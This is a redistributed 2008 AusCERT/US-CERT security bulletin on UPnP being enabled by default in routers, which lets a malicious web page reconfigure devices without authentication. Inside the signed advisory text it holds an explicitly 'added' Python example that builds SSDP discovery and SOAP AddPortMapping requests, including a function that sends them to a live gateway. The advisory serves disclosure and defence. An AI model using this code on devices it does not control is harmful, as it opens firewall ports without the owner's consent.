Published:
08 April 2008
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                      ESB-2008.0068 -- [Appliance]
                         Vulnerability in UPnP
                              8 April 2008

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           UPnP
Publisher:         US-CERT
Impact:            Execute Arbitrary Code/Commands
                   Modify Arbitrary Files
                   Inappropriate Access
Access:            Remote/Unauthenticated
CVE Names:         CVE-2008-1654

Revision History:  April 8 2008:    Added CVE information
                   January 18 2008: Initial Release

- --------------------------BEGIN INCLUDED TEXT--------------------

Vulnerability Note VU#347812

UPnP enabled by default in multiple devices

Overview

   Multiple vendors ship devices with UPnP enabled by default. By
   convincing a user to open a malicious URL, an attacker may be able to
   remotely control or configure UPnP-enabled devices.

I. Description

   Universal Plug and Play (UPnP) is a collection of protocols maintained
   and distributed by the UPnP Forum. UPnP is designed to let network
   devices connect to each other easily. UPnP-enabled applications may be
   able to control other UPnP-enabled devices, such as firewalls or
   routers, automatically and without authentication. Some applications
   rely on UPnP to open ports on routers or to set other parameters on
   compatible devices automatically.

   Multiple vendors ship devices with UPnP enabled by default. These
   devices may be configured to listen for UPnP requests only on local
   network or wireless interfaces, but that does not protect against
   requests that originate from a host inside the local network. By
   using browser plugins that can issue requests from the victim's
   machine, an attacker may be able to send UPnP messages to local
   devices without authentication. One researcher has demonstrated an
   attack vector that uses the Adobe Flash plugin.

   Note that to exploit this vulnerability an attacker needs to know or
   guess the IP address of an affected device, together with the path of
   the UPnP control URL used by that device's firmware: the Flash vector
   cannot perform the SSDP multicast discovery that a normal UPnP client
   uses to learn both.
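   The exchange the Description refers to, as an added example that is
   not part of the advisory and is not code from US-CERT or from the
   GNUCITIZEN research: it builds the three messages a UPnP control point
   sends to an Internet Gateway Device (SSDP M-SEARCH, device-description
   lookup, SOAP AddPortMapping on the WANIPConnection service) and parses
   the device's replies. The gateway address 192.168.1.1, the paths
   /igd.xml and /upnp/control/WANIPConn1 and every device reply are
   constructed sample data for the example; the fault code 718
   (ConflictInMappingEntry) is the one the WANIPConnection service
   defines for a clashing mapping.

```python
# Added example, not code from the advisory or from the GNUCITIZEN research.
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin
import xml.etree.ElementTree as ET

SSDP_GROUP, SSDP_PORT = "239.255.255.250", 1900   # standard SSDP multicast group
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
DEV_NS = "{urn:schemas-upnp-org:device-1-0}"
SOAP_NS = "{http://schemas.xmlsoap.org/soap/envelope/}"
CTRL_NS = "{urn:schemas-upnp-org:control-1-0}"

# Constructed sample replies; gateway 192.168.1.1 and both paths are assumed.
SAMPLE_SSDP_REPLY = ("HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\n"
                     "LOCATION: http://192.168.1.1:1900/igd.xml\r\n"
                     f"ST: {WANIP}\r\n\r\n")
SAMPLE_DESCRIPTION = f"""<root xmlns="urn:schemas-upnp-org:device-1-0"><device>
 <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
 <deviceList><device>
  <deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
  <deviceList><device>
   <deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
   <serviceList><service><serviceType>{WANIP}</serviceType>
    <controlURL>/upnp/control/WANIPConn1</controlURL></service></serviceList>
  </device></deviceList></device></deviceList></device></root>"""
SAMPLE_OK_REPLY = ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
                   f'<s:Body><u:AddPortMappingResponse xmlns:u="{WANIP}"/></s:Body>'
                   "</s:Envelope>")
SAMPLE_FAULT_REPLY = ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
                      "<s:Body><s:Fault><faultcode>s:Client</faultcode>"
                      "<faultstring>UPnPError</faultstring><detail>"
                      '<UPnPError xmlns="urn:schemas-upnp-org:control-1-0">'
                      "<errorCode>718</errorCode><errorDescription>"
                      "ConflictInMappingEntry</errorDescription></UPnPError>"
                      "</detail></s:Fault></s:Body></s:Envelope>")

def build_msearch(st=WANIP, mx=2):
    """Step 1, discovery: SSDP M-SEARCH, sent by UDP to the multicast group.
    The Flash plugin cannot send UDP, so the attack in the advisory skips
    this step and guesses the gateway address and control URL instead."""
    return (f"M-SEARCH * HTTP/1.1\r\nHOST: {SSDP_GROUP}:{SSDP_PORT}\r\n"
            f'MAN: "ssdp:discover"\r\nMX: {mx}\r\nST: {st}\r\n\r\n')

def parse_ssdp_reply(raw):
    """LOCATION header of an SSDP reply: URL of the device description XML."""
    m = re.search(r"^LOCATION:\s*(\S+)", raw, re.I | re.M)
    return m.group(1) if m else None

def find_control_url(description_xml, service_type=WANIP):
    """Step 2: walk the nested device tree for the service's controlURL."""
    for svc in ET.fromstring(description_xml).iter(DEV_NS + "service"):
        if svc.findtext(DEV_NS + "serviceType") == service_type:
            return svc.findtext(DEV_NS + "controlURL")
    return None

def build_add_port_mapping(ext_port, int_client, int_port, proto="TCP", lease=0):
    """Step 3: the control request, as (headers, body) for an HTTP POST to the
    control URL. Nothing in it identifies or authenticates the caller; the
    device honours any host that can reach the URL, including a browser."""
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": f'"{WANIP}#AddPortMapping"'}
    body = ('<?xml version="1.0"?>'
            '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
            f'<u:AddPortMapping xmlns:u="{WANIP}"><NewRemoteHost></NewRemoteHost>'
            f"<NewExternalPort>{ext_port}</NewExternalPort>"
            f"<NewProtocol>{proto}</NewProtocol>"
            f"<NewInternalPort>{int_port}</NewInternalPort>"
            f"<NewInternalClient>{int_client}</NewInternalClient>"
            "<NewEnabled>1</NewEnabled>"
            "<NewPortMappingDescription>example</NewPortMappingDescription>"
            f"<NewLeaseDuration>{lease}</NewLeaseDuration>"
            "</u:AddPortMapping></s:Body></s:Envelope>")
    return headers, body

def parse_control_reply(raw):
    """("ok", None) for an <Action>Response, ("fault", errorCode) when the
    device rejects the action (718 is ConflictInMappingEntry)."""
    body = ET.fromstring(raw).find(SOAP_NS + "Body")
    fault = body.find(SOAP_NS + "Fault")
    if fault is None:
        return ("ok", None)
    code = fault.find(".//" + CTRL_NS + "errorCode")
    return ("fault", code.text if code is not None else None)

def post_control(location, control_url, headers, body, timeout=3):
    """Deliver the request to a live gateway (needs network; not used by the
    samples). A UPnP fault arrives as HTTP 500, so read it from the error."""
    req = urllib.request.Request(urljoin(location, control_url),
                                 data=body.encode(), headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return parse_control_reply(resp.read())
    except urllib.error.HTTPError as err:
        return parse_control_reply(err.read())

if __name__ == "__main__":
    # Walk the whole exchange offline over the constructed samples.
    hdrs, body = build_add_port_mapping(2222, "192.168.1.23", 22)
    print(parse_ssdp_reply(SAMPLE_SSDP_REPLY), find_control_url(SAMPLE_DESCRIPTION))
    print(hdrs["SOAPAction"], parse_control_reply(SAMPLE_FAULT_REPLY))
```

   Run offline, the main block walks the samples; post_control is what a
   real client, or the Flash vector producing an equivalent cross-origin
   POST from the victim's browser, sends to the live control URL. The
   point to take from the envelope is that no field in it names or
   authenticates the sender, which is why a device that honours it from
   any LAN host also honours it from a browser on that LAN.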
   The device's IP address may also be enumerated through browser
   headers or other methods.

II. Impact

   By convincing a victim to click on a link in an HTML document (web
   page, HTML email), an attacker could issue any command or change any
   configuration that can be set via UPnP on an affected device. If the
   affected device provides routing or firewalling services to clients,
   an attacker may be able to change firewall and port-forwarding rules,
   modify DNS settings, change wireless encryption keys, or set
   arbitrary administration passwords.

III. Solution

   We are currently unaware of a practical solution to this problem.

   Workarounds for administrators

     * UPnP should be disabled on devices that are being used to enforce
       security policies or are connected to untrusted networks, such as
       the Internet.

     * Filtering SSDP multicast (239.255.255.250, port 1900/udp) and the
       IGMP membership traffic between LAN segments may prevent UPnP
       devices from being discovered from, or connecting to, networks
       they are not authorized to access. This limits discovery only:
       the browser-based attack described above sends its request to a
       guessed address directly and does not depend on discovery.

   Workarounds for users

     * Disabling UPnP on network devices will mitigate this
       vulnerability. Note that disabling UPnP will cause any devices or
       applications that rely on UPnP to fail or operate with reduced
       functionality.

     * Disabling UPnP in desktop operating systems may prevent an
       attacker from exploiting this vulnerability against UPnP services
       hosted on the desktop itself; it does not stop a browser plugin
       from talking directly to a router's control interface. Microsoft
       Windows XP users should see the workarounds section of Microsoft
       Security Bulletin MS07-019 for instructions on how to disable
       UPnP.

     * Using the Mozilla Firefox NoScript extension to whitelist the web
       sites that can run scripts and access installed plugins may
       prevent this vulnerability from being exploited.

     * Using host-based firewalls to filter ports 1900/udp and 2869/tcp
       both inbound and outbound may prevent this vulnerability from
       being exploited by blocking the ports used by UPnP discovery and
       by the Windows UPnP service. Note that the Windows Vista firewall
       blocks UPnP by default. This workaround may not prevent
       exploitation: the control request goes to whatever HTTP port the
       router's device description advertises for its control URL, which
       is often neither 1900 nor 2869, so blocking those two ports on the
       host does not block the request itself.

Systems Affected

   Vendor                                          Status          Date Updated
   3com, Inc.                                      Unknown         15-Jan-2008
   Alcatel                                         Unknown         15-Jan-2008
   Apple Computer, Inc.                            Unknown         15-Jan-2008
   AT&T                                            Unknown         15-Jan-2008
   Avaya, Inc.                                     Unknown         15-Jan-2008
   Avici Systems, Inc.                             Unknown         15-Jan-2008
   Borderware Technologies                         Unknown         15-Jan-2008
   Bro                                             Unknown         15-Jan-2008
   CentOS                                          Unknown         15-Jan-2008
   Charlotte's Web Networks                        Unknown         15-Jan-2008
   Check Point Software Technologies               Unknown         15-Jan-2008
   Cisco Systems, Inc.                             Unknown         15-Jan-2008
   Clavister                                       Unknown         15-Jan-2008
   Computer Associates                             Unknown         15-Jan-2008
   Computer Associates eTrust Security Management  Unknown         15-Jan-2008
   Conectiva Inc.                                  Unknown         15-Jan-2008
   Cray Inc.                                       Unknown         15-Jan-2008
   D-Link Systems, Inc.                            Unknown         15-Jan-2008
   Data Connection, Ltd.                           Unknown         15-Jan-2008
   Debian GNU/Linux                                Unknown         15-Jan-2008
   EMC Corporation                                 Unknown         15-Jan-2008
   Engarde Secure Linux                            Unknown         15-Jan-2008
   Enterasys Networks                              Unknown         15-Jan-2008
   Ericsson                                        Unknown         15-Jan-2008
   eSoft, Inc.                                     Unknown         15-Jan-2008
   Extreme Networks                                Unknown         15-Jan-2008
   F5 Networks, Inc.                               Unknown         15-Jan-2008
   Fedora Project                                  Unknown         15-Jan-2008
   Force10 Networks, Inc.                          Unknown         15-Jan-2008
   Fortinet, Inc.                                  Unknown         15-Jan-2008
   Foundry Networks, Inc.                          Unknown         15-Jan-2008
   FreeBSD, Inc.                                   Unknown         15-Jan-2008
   Fujitsu                                         Unknown         15-Jan-2008
   Gentoo Linux                                    Unknown         15-Jan-2008
   Global Technology Associates                    Unknown         15-Jan-2008
   Hewlett-Packard Company                         Unknown         15-Jan-2008
   Hitachi                                         Unknown         15-Jan-2008
   Hyperchip                                       Unknown         15-Jan-2008
   IBM Corporation                                 Unknown         15-Jan-2008
   IBM Corporation (zseries)                       Unknown         15-Jan-2008
   IBM eServer                                     Unknown         15-Jan-2008
   Ingrian Networks, Inc.                          Unknown         15-Jan-2008
   Intel Corporation                               Unknown         15-Jan-2008
   Internet Security Systems, Inc.                 Unknown         15-Jan-2008
   Intoto                                          Unknown         15-Jan-2008
   IP Filter                                       Unknown         15-Jan-2008
   Juniper Networks, Inc.                          Unknown         15-Jan-2008
   Linksys (A division of Cisco Systems)           Unknown         15-Jan-2008
   Lucent Technologies                             Unknown         15-Jan-2008
   Luminous Networks                               Unknown         15-Jan-2008
   m0n0wall                                        Unknown         15-Jan-2008
   Mandriva, Inc.                                  Unknown         15-Jan-2008
   McAfee                                          Unknown         15-Jan-2008
   Microsoft Corporation                           Unknown         15-Jan-2008
   MontaVista Software, Inc.                       Unknown         15-Jan-2008
   Multinet (owned Process Software Corporation)   Unknown         15-Jan-2008
   Multitech, Inc.                                 Unknown         15-Jan-2008
   NEC Corporation                                 Unknown         15-Jan-2008
   NetBSD                                          Unknown         15-Jan-2008
   netfilter                                       Unknown         15-Jan-2008
   Netgear, Inc.                                   Unknown         15-Jan-2008
   Network Appliance, Inc.                         Unknown         15-Jan-2008
   NextHop Technologies, Inc.                      Unknown         15-Jan-2008
   Nokia                                           Unknown         15-Jan-2008
   Nortel Networks, Inc.                           Unknown         15-Jan-2008
   Novell, Inc.                                    Unknown         15-Jan-2008
   OpenBSD                                         Unknown         15-Jan-2008
   Openwall GNU/*/Linux                            Unknown         16-Jan-2008
   QNX, Software Systems, Inc.                     Unknown         15-Jan-2008
   RadWare, Inc.                                   Unknown         15-Jan-2008
   Red Hat, Inc.                                   Unknown         15-Jan-2008
   Redback Networks, Inc.                          Unknown         15-Jan-2008
   Riverstone Networks, Inc.                       Unknown         15-Jan-2008
   Secure Computing Network Security Division      Unknown         15-Jan-2008
   Secureworx, Inc.                                Unknown         15-Jan-2008
   Silicon Graphics, Inc.                          Unknown         15-Jan-2008
   Slackware Linux Inc.                            Unknown         15-Jan-2008
   SmoothWall                                      Unknown         15-Jan-2008
   Snort                                           Unknown         15-Jan-2008
   Sony Corporation                                Unknown         15-Jan-2008
   Sourcefire                                      Unknown         15-Jan-2008
   Stonesoft                                       Unknown         15-Jan-2008
   Sun Microsystems, Inc.                          Unknown         15-Jan-2008
   SUSE Linux                                      Unknown         15-Jan-2008
   Symantec, Inc.                                  Unknown         15-Jan-2008
   The SCO Group                                   Unknown         15-Jan-2008
   TippingPoint, Technologies, Inc.                Not Vulnerable  16-Jan-2008
   Trustix Secure Linux                            Unknown         15-Jan-2008
   Turbolinux                                      Unknown         15-Jan-2008
   Ubuntu                                          Unknown         15-Jan-2008
   Unisys                                          Unknown         15-Jan-2008
   Watchguard Technologies, Inc.                   Unknown         15-Jan-2008
   Wind River Systems, Inc.                        Unknown         15-Jan-2008
   ZyXEL                                           Unknown         15-Jan-2008

References

   http://www.upnp.org/
   http://www.upnp.org/download/UPnP_Vendor_Implementation_Guide_Jan2001.htm
   http://www.upnp.org/membership/members.asp
   http://www.gnucitizen.org/blog/hacking-the-interwebs
   http://windowshelp.microsoft.com/Windows/en-US/Help/32f3845b-eda0-4168-be8d-90f07250d8101033.mspx
   http://www.microsoft.com/technet/security/Bulletin/MS07-019.mspx
   http://www.us-cert.gov/reading_room/securing_browser/
   http://noscript.net/features#contentblocking
   http://linux-igd.sourceforge.net/
   http://www.shorewall.net/UPnP.html

Credit

   Information about this vulnerability was released by PDP on the
   GNUCITIZEN website.

   This document was written by Ryan Giobbi.

Other Information

   Date Public            01/15/2008
   Date First Published   01/15/2008 01:47:51 PM
   Date Last Updated      01/16/2008
   CERT Advisory
   CVE Name
   Metric                 9.83
   Document Revision      52

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to
auscert@auscert.org.au and we will forward your request to the
appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no
control over its content. The decision to follow or act on information or
advice contained in this security bulletin is the responsibility of each
user or organisation, and should be considered in accordance with your
organisation's site policies and procedures. AusCERT takes no
responsibility for consequences which may arise from following or acting
on information or advice contained in this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at a
later date, it is recommended that the bulletin is retrieved directly from
the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

If you believe that your computer system has been compromised or attacked
in any way, we encourage you to let us know by completing the secure
National IT Incident Reporting Form at:

        http://www.auscert.org.au/render.html?it=3192

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQCVAwUBR/rDmih9+71yA2DNAQKoswP/aiNdXJ0wRyes4vYCnMz5VYXdl8r7/KSj
nZR4twlK2pgBZIYKGvd3LJdb2a6kazi5TYyLLuhYAlq6+7G2PAW6e8CU3aLE2npb
qdH+bTe2P3/pJdpqhFp7WqMj9zOGIObRMWGAV25A0EhNd1YOBOa4JfWUOGY4SD1Q
88G9kxhYRN4=
=pE/5
-----END PGP SIGNATURE-----